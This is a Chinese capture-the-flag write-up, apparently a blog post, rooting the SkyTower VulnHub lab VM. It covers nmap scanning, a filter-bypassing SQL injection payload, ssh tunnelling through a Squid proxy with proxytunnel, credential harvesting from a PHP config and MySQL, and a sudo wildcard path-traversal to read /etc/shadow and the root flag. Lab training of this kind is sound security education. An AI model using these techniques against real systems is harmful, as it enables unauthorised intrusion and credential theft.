526互联

Skytower

发布时间 2023-10-11 11:19:27作者: 吴语`

靶机 192.168.1.144
kali 192.168.1.128
vulnhub上该靶机为.vbox文件,需将其导入VMBox中再导出为.ova文件导入VMWare使用,注意导入成功后查看一下网络设置。
信息收集 nmap先扫一下

sudo nmap --min-rate 10000 -p- 192.168.1.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:13 CST
Nmap scan report for bogon (192.168.1.144)
Host is up (0.00067s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http

sudo nmap -sT -sV -O -p22,80,3128 192.168.1.144
[sudo] wyh 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:13 CST
Nmap scan report for bogon (192.168.1.144)
Host is up (0.00040s latency).

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
3128/tcp open     http-proxy Squid http proxy 3.1.20
MAC Address: 00:0C:29:F3:01:01 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

sudo nmap -sU -p22,80,3128 192.168.1.144    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 14:14 CST
Nmap scan report for bogon (192.168.1.144)
Host is up (0.00034s latency).

PORT     STATE  SERVICE
22/udp   closed ssh
80/udp   closed http
3128/udp closed ndl-aas

3128开启了Squid 3.1.20网页代理服务,可能存在旧版本漏洞;
访问web端是一个登录页面,也可能存在web漏洞,测试了下发现存在sql注入,并有错误回显,
burp转包甩给sqlmap,发现跑不出数据,应该是有过滤,尝试手工测一下。
试了下发现简单的双写就能绕过去
email=admin'oorr 1>0 #&password=123
返回信息中有账号的密码,尝试ssh,发现无法登录,可能需要代理跳转
可以使用proxytunnel进行跳转,
proxytunnel -a 6666 -p 192.168.1.144:3128 -d 192.168.1.144:22
在本地监听6666端口;当有连接到本地6666端口的请求时;proxytunnel会将请求通过192.168.1.144:3128这个代理转发;最终转发至远程目标192.168.1.144的22端口。
实现通过代理隧道连接远程ssh服务器。
proxytunnel是本地端口转发,主要用于转发单个的TCP端口
然后连接ssh
ssh john@127.0.0.1 -p 6666
发现连接成功后自动退出,百度之后发现虽然自动退出,但是登录成功时还是可以执行一些命令

ssh john@127.0.0.1 -p 6666 id
john@127.0.0.1's password: 
uid=1000(john) gid=1000(john) groups=1000(john)

ssh john@127.0.0.1 -p 6666 /bin/bash
john@127.0.0.1's password: 
id
uid=1000(john) gid=1000(john) groups=1000(john)

拿到了非交互式命令行,怎么切换到交互式命令行呢,或者将ssh相关设置不自动退出。

bash 在每次启动时都会加载 .bashrc 文件的内容。每个用户的 home 目录都有这个 shell 脚本。它用来存储并加载你的终端配置和环境变量。
cat .bashrc
发现最后一行有exit函数,删除这个函数
sed -i '$d' .bashrc
重新连接ssh,登录成功

ssh john@127.0.0.1 -p 6666          
john@127.0.0.1's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct  8 11:09:55 2023 from 192.168.1.144

Funds have been withdrawn
john@SkyTower:~$

用msf查了一下内核,没找到可以用的,尝试用数据库提,进行www目录,找配置文件,查看相关信息
在login.php中发现

john@SkyTower:/var/www$ cat login.php 
<?php                                                                                                                                      
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

登录 root;root
-h 指定主机,-u 指定用户,-p 表示需要密码

john@SkyTower:/var/www$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 17793
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

查看数据库中信息

john@skytech.com    | hereisjohn   |
sara@skytech.com    | ihatethisjob |
william@skytech.com | senseable

发现三个账户密码 分别登录web页面发现ssh密码和web密码一样

ssh sara@127.0.0.1 -p 6666 /bin/bash
sara@127.0.0.1's password: 
id
uid=1001(sara) gid=1001(sara) groups=1001(sara)

重复之前的操作,删除.bashrc最后一行的exit函数
sed -i '$d' .bashrc
重新ssh连接

ssh sara@127.0.0.1 -p 6666          
sara@127.0.0.1's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 11 06:05:12 2023 from 192.168.1.144

Funds have been withdrawn
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

发现可以再accounts文件夹下执行root命令
sara@SkyTower:~$ sudo cat /accounts/../etc/shadow
直接查看shadow,SHA512算法加盐加密,好像用john破解不出,到处找文件,最后在root文件夹下的flag.txt找到root密码

sara@SkyTower:~$ sudo cat /accounts/../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:~$ su root
Password: 
root@SkyTower:/home/sara# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:/home/sara#